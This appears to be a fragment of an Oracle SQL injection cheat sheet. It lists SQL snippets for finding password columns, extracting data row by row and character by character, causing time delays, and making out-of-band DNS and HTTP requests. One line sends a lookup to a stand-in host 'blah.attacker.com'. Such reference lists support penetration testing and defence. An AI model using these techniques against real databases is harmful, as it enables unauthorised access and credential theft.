Find Tables From Column Name--------------
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case
Select Nth Row-------------------------
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)
Select Nth Char
SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'
Bitwise AND
SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns0
ASCII Value -> Char-------------
SELECT chr(65) FROM dual; -- returns A
Char -> ASCII Value---------
SELECT ascii('A') FROM dual; -- returns 65
Casting---------------------------------
SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;
String Concatenation-------------------
SELECT 'A' || 'B' FROM dual; -- returns AB
If Statement--------------------------------
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements
Case Statement-------------
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
Avoiding Quotes ------------------
SELECT chr(65) || chr(66) FROM dual; -- returns AB
Time Delay ---------------------------
BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse looks are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('') FROM dual; -- if outbound TCP is filtered / slow
-- Also see Heavy Queries to create a time delay
Make DNS Requests---------------------------------
SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('') FROM dual;
Command Execution--------------------------------
Java can be used to execute commands if it's installed.
ExtProc can sometimes be used too, though it normally failed for me. :-(
Local File Access----------------------------
UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Hostname, IP Address-----------
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames
Location of DB files---------------
SELECT name FROM V$DATAFILE;